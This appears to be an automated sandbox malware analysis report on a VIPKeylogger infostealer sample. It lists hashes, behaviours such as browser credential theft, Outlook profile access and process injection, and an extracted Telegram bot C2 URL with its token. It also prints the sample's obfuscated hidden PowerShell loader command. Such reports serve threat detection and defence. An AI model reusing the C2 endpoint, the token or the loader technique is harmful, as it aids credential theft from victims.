Analysis
- max time kernel: 148s
- max time network: 150s
- platform: windows10-2004_x64
- resource: win10v2004-20240802-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 30/08/2024, 01:40
Static task: static1
Behavioral task: behavioral1
- Sample: 89a9123df318a4c77a378e687f5e4c1c7f7806d64c85a7360a556b487343a49b.exe
- Resource: win7-20240705-en
Behavioral task: behavioral2
- Sample: 89a9123df318a4c77a378e687f5e4c1c7f7806d64c85a7360a556b487343a49b.exe
- Resource: win10v2004-20240802-en
General
- Target: 89a9123df318a4c77a378e687f5e4c1c7f7806d64c85a7360a556b487343a49b.exe
- Size: 698KB
- MD5: 0815e4fcd9b75660891ec15ce119fa70
- SHA1: 7f8c1c73194725dce424b72ff2306203f3590c3b
- SHA256: 89a9123df318a4c77a378e687f5e4c1c7f7806d64c85a7360a556b487343a49b
- SHA512: c613b96c177294bbbfce2e0b86d15f32d2c7c579bf4c50ef0940ae697e7cfa0f36512ff7fa221c2a5b6963ca6b000b34876707bdc56351c20d20a3ee54fa68ba
- SSDEEP: 12288:67MJHZFQpHB5LOBTCUbINBoQYwXsCGJt5aFp0zS6w+CAG0snsQc:6IJHoph5CBTCUUN6QYwZrH6VfAsQc
Malware Config
- Extracted: vipkeylogger
- C2 (Telegram Bot API): https://api.telegram.org/bot7480851360:AAFGFIgeYioB7dUKsMFuCrt400Zxu2IugeM/sendMessage?chat_id=6070006284
Signatures
- VIPKeylogger
  VIPKeylogger is a keylogger and infostealer written in C#; it resembles SnakeKeylogger, which was found in 2020.
- Credentials from Password Stores: Credentials from Web Browsers (1 TTP)
  Malicious access to, or copying of, a web browser credential store.
- Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
  Runs PowerShell with the display window hidden.
  PID 4348 powershell.exe
- Accesses Microsoft Outlook profiles (1 TTP, 3 IoCs)
  Key opened \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (ImagingDevices.exe)
  Key opened \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (ImagingDevices.exe)
  Key opened \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (ImagingDevices.exe)
- Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  flow 31: drive.google.com
  flow 32: drive.google.com
- Looks up external IP address via web service (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow 44: checkip.dyndns.org
- Drops file in System32 directory (1 IoC)
  File opened for modification C:\Windows\SysWOW64\legionrernes.Bac (89a9123df318a4c77a378e687f5e4c1c7f7806d64c85a7360a556b487343a49b.exe)
- Suspicious use of NtCreateThreadExHideFromDebugger (1 IoC)
  PID 4560 ImagingDevices.exe
- Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  PID 4348 powershell.exe
  PID 4560 ImagingDevices.exe
- Suspicious use of SetThreadContext (1 IoC)
  PID 4348 set thread context of 4560 (pid 4348, powershell.exe, procid_target 97)
- Drops file in Program Files directory (1 IoC)
  File opened for modification C:\Program Files (x86)\Common Files\underskridelser.ini (89a9123df318a4c77a378e687f5e4c1c7f7806d64c85a7360a556b487343a49b.exe)
- Drops file in Windows directory (1 IoC)
  File opened for modification C:\Windows\Fonts\battable.ini (89a9123df318a4c77a378e687f5e4c1c7f7806d64c85a7360a556b487343a49b.exe)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- System Location Discovery: System Language Discovery (1 TTP, 3 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (89a9123df318a4c77a378e687f5e4c1c7f7806d64c85a7360a556b487343a49b.exe)
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (powershell.exe)
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (ImagingDevices.exe)
- Suspicious behavior: EnumeratesProcesses (9 IoCs)
  PID 4348 powershell.exe (7 entries)
  PID 4560 ImagingDevices.exe (2 entries)
- Suspicious behavior: MapViewOfSection (1 IoC)
  PID 4348 powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Token: SeDebugPrivilege (pid 4348, powershell.exe)
  Token: SeDebugPrivilege (pid 4560, ImagingDevices.exe)
- Suspicious use of WriteProcessMemory (8 IoCs)
  PID 1608 wrote to memory of 4348 (pid 1608, 89a9123df318a4c77a378e687f5e4c1c7f7806d64c85a7360a556b487343a49b.exe, procid_target 87), 3 entries
  PID 4348 wrote to memory of 4560 (pid 4348, powershell.exe, procid_target 97), 5 entries
- outlook_office_path (1 IoC)
  Key opened \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (ImagingDevices.exe)
- outlook_win_path (1 IoC)
  Key opened \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (ImagingDevices.exe)
Processes
- C:\Users\Admin\AppData\Local\Temp\89a9123df318a4c77a378e687f5e4c1c7f7806d64c85a7360a556b487343a49b.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\89a9123df318a4c77a378e687f5e4c1c7f7806d64c85a7360a556b487343a49b.exe"
  PID: 1608
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" -windowstyle hidden "$Kludgy=Get-Content 'C:\Users\Admin\AppData\Local\errancies\Tansies.Tem';$Crushes53=$Kludgy.SubString(52844,3);.$Crushes53($Kludgy)
    PID: 4348
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
      Command line: "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
      PID: 4560
      - Accesses Microsoft Outlook profiles
      - Suspicious use of NtCreateThreadExHideFromDebugger
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - outlook_office_path
      - outlook_win_path
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- Filesize: 51KB
  MD5: 5d38b5b5dd9df5889a8cdae91bda8ce0
  SHA1: 55d4f7428bfc7a1c572e2f65d2877f53dfe9b00c
  SHA256: 45c83c93a697679fb2f35ba68b3df5393398970f0adbda0f8af697080a661a07
  SHA512: 9632d65d07e63235746f60133dfeaad9474db92a70d2264300d3f433399b0ca0e647120d3393d07e5f722597ec1e14a4111f9b0819886cb11f646d75c1e6be8d
- Filesize: 315KB
  MD5: 657f4fbdce2aec00af95560a9bb2f05f
  SHA1: 05d405cdf1e9b5617ff83d7833d7eb4f011a017b
  SHA256: dc6ea094e7cd8bb7306cb687eb37b1e8c711ea58c626628cd3c70dc329bdde6d
  SHA512: 9f77c539e9e76a3b9f3b77f5e7a771b23881daefd267cce693e77d40b0cb9a0cfb0371c61d9e5395af20d5395c5b0cc886828099ea136f35b87ef9f6ba638b38